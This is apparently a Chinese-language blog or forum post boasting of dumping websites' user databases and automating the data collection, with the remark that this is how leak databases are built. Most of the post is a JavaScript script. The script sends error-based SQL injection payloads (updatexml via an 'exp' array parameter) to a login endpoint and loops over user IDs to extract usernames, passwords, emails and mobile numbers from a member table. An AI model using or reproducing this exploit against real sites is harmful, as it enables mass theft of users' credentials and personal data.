今天是真的曝了几个库，而且实现了全自动化记录数据。

一个网站可以曝出几百上千的用户信息，这下知道所谓的社工库怎么来的了吧：

var bb=0;

var logs = "";

for(i=1;i<400;i){

	var username=new Array();

	username[0] = "exp";

	bb++;

	switch(bb){

		case 1:

			username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',username) from nqx_ucenter_member where id="+i+")),0)";

		break;

		case 2:

			username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',password) from nqx_ucenter_member where id="+i+")),0)";

		break;

		case 3:

			username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',email) from nqx_ucenter_member where id="+i+")),0)";

		break;

		case 4:

			username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',mobile) from nqx_ucenter_member where id="+i+")),0)";

			bb=0;

			i++;

		break;

	

	}	

	password = 1;

	var data = {

	 	username: username,

		password:password	

	};



	$.ajax({

		type: 'POST',

		url: '',

		data:data,

		success: (function(){}),

		error:(function(ele){

			tmp = ele.responseText.match(/XPATH syntax error: '([^<]*)<\/h1>/g)[0].split('+');

			tmp = tmp[1].split("'<");

			tmp = tmp[0];

			logs += tmp+",";

			if(bb==0){

				logs += "\n\r";

				console.log(logs);

				logs = "";

			}

		}),

		async:false

		

	}); 

	

}